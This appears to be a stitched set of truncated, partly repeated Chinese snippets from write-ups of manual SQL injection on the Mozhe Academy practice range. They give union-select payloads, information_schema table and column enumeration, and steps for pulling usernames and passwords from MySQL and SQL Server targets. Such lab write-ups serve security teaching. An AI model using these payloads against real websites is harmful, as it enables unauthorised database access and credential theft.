一开始我直接在tingjigonggao后面加上' union select 1,version(),database(),4 %23发现返回的只有正常页面后来尝试了下发现把tingjigonggao改成1或者其他内容就能返回我们想要的数据库名了,我觉得可能是停机公告是由内容查询出来的所以直接就把标题和内容的位置占据了,把我们想让他显示出来的版本号和数据库名给盖...
回显位置为 2 和 3 爆当前数据库 id=1' union select 1,2,database(),4--+ 得到数据库是 mozhe_discuz_stormgroup 爆表名 id=1' union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema like database()--+ 得到数据表为 notice,stormgroup_member 爆列名 ...
information_schema:MySQL自带的数据库,存储了数据库中所有的数据库、表和列信息 information_schema.tables:所有表信息 information_schema.columns:所有列信息 table_schema:数据库名称 table_name:表名称 column_name:列名称 group_concat(table_name):列出所有表名 __EOF__...
2.查看当前数据库名和版本 id=' union select '1',database(),version(),'4' --+ 这里命令前面不需要加引号 得到的结果是数据库名为:mozhe_discuz_stormgroup 数据库版本为:10.2.15-MariaDB-log 3.查看当前数据库中的所有表 id=' union select '1',group_concat(table_name),'3','4' from informa...
先浏览页面判断存在注入 >查长度>查数据库>查表>查字段>查数据数量>查用户+密码>解密登录 找不到可注入点可以观察网页是否可以跳转到其他页面,并重新寻找注入点,查询的时候尽量使用group_concat()防止漏数据。 (1. 登录页面没有账号密码,只能暴破或者SQL注入数据库查看帐号密码 2. 发现公告中存在注入点 3. 通过...
SQL手工注入漏洞测试(MySQL数据库) 使用墨者学院靶场测试 先浏览页面判断存在注入 >查长度>查数据库>查表>查字段>查数据数量>查用户+密码>解密登录 找不到可注入点可以观察网页是否可以跳转到其他页面,并重新寻找注入点,查询的时候尽量使用group_concat()防止漏数据。
和mysql 注入有些不同,union select 无法使用,Sql Server数据库只能用 union all 1、判断注入点。 //219.153.49.228:41635/new_list.asp?id=2 and 1=1访问成功;/new_list.asp?id=2 and 1=2访问失败。 image.png 2、判断列的情况。 order by x,x=1、2、4时成功,=3、5、6、7、8时失败。
SQL手工注入漏洞测试(MySQL数据库) 使用墨者学院靶场测试 先浏览页面判断存在注入 >查长度>查数据库>查表>查字段>查数据数量>查用户+密码>解密登录 找不到可注入点可以观察网页是否可以跳转到其他页面,并重新寻找注入点,查询的时候尽量使用group_concat()防止漏数据。
墨者学院--手工注入mysql数据库实例 开启墨者靶场环境,发现此界面,在点击登陆下方的通知之后惊奇的看到存在参数id,可以试试通过传递SQL语句获取数据库信息. 我们可以试试1=1和1=2大法,输入在参数id=1后面加入1=1进行逻辑判断 显示正常,然后换1=2,因为1=2为一个假命题,如果能插入到数据库进行逻辑判断,那么...
该靶场名为字符型SQL注入,首先便应该怀疑ID参数是否为注入点。 尝试更改参数为tingjigonggao' and '1'=1回显同样的通知 尝试更改参数为tingjigonggao' and '1'=2回显报错,如下图所示 通过这个判断,即可确定注入点。 简单SQL注入靶场无非以下几个步骤: ...